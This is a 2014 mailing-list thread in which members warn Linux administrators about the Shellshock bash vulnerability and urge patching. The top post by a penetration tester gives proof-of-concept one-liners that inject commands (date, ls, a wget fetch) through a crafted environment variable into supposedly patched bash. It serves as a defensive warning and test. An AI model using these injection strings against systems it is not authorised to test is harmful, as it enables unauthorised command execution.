This Vulnerability is worse than Heartbleed, even after patching Bash, you can still inject into it. rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo rm -f echo && env -i X='() { (a)=>\' bash -c 'echo ls -la'; cat echo rm -f echo && env -i X='() { (a)=>\' bash -c 'echo wget http://my.co.ke/'; Be prepared to patch, and still watch your systems, and patch later on, when a full one is released. On 9/26/14, Amarjit Labhuram via skunkworks <skunkworks@lists.my.co.ke> wrote:
To the linux admins,
here is some more info on Shellshock. http://www.bbc.com/news/technology-29361794/
Have a great day!
Warm regards, Amarjit Singh Labhuram.
On Thu, Sep 25, 2014 at 5:08 PM, Laban Mwangi via skunkworks < skunkworks@lists.my.co.ke> wrote:
Any thing that uses bash (Linux/FreeBSD/OSX/Cygwin)... Potentially, this includes your home router (dlink, linksys)!
On Thu, Sep 25, 2014 at 8:38 AM, Bwana Lawi via skunkworks < skunkworks@lists.my.co.ke> wrote:
If you are using Red Hat products, please have this patched.
Read more here.
_______________________________________________ skunkworks mailing list skunkworks@lists.my.co.ke ------------ List info, subscribe/unsubscribe http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks ------------
Skunkworks Rules http://my.co.ke/phpbb/viewtopic.php?f=24&t=94 ------------ Other services @ http://my.co.ke
_______________________________________________ skunkworks mailing list skunkworks@lists.my.co.ke ------------ List info, subscribe/unsubscribe http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks ------------
Skunkworks Rules http://my.co.ke/phpbb/viewtopic.php?f=24&t=94 ------------ Other services @ http://my.co.ke
-- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/